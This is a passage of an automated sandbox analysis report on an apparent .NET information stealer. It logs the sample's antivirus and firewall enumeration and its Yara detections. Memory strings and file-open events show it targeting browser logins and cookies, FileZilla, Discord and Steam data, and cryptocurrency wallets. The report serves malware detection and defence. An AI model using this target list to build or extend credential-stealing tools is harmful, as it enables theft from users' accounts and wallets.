Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Users\user\Desktop\9nvo2o410p.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\9nvo2o410p.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: FAwLPzxPWWF.exe, 00000010.00000002.1877912174.000000000651D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.9nvo2o410p.exe.5a20000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.3e70f90.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.3e70f90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.5a20000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1673501773.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1687683742.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 8.2.9nvo2o410p.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4130440.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4118620.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4130440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4118620.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1803146897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9nvo2o410p.exe PID: 8, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9nvo2o410p.exe PID: 7436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FAwLPzxPWWF.exe PID: 7836, type: MEMORYSTR
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: FAwLPzxPWWF.exe, 00000010.00000002.1859987752.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: FAwLPzxPWWF.exe, 00000010.00000002.1862640276.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Ethereum\wallets
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: FAwLPzxPWWF.exe, 00000010.00000002.1862640276.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: FAwLPzxPWWF.exe, 00000010.00000002.1862640276.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $dq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.0000000003E59000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: Yara match File source: 8.2.9nvo2o410p.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4130440.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4118620.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4130440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4118620.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1803146897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9nvo2o410p.exe PID: 8, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9nvo2o410p.exe PID: 7436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FAwLPzxPWWF.exe PID: 7836, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.9nvo2o410p.exe.5a20000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.3e70f90.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.3e70f90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.5a20000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1673501773.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1687683742.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 8.2.9nvo2o410p.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4130440.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4118620.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4130440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9nvo2o410p.exe.4118620.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1803146897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
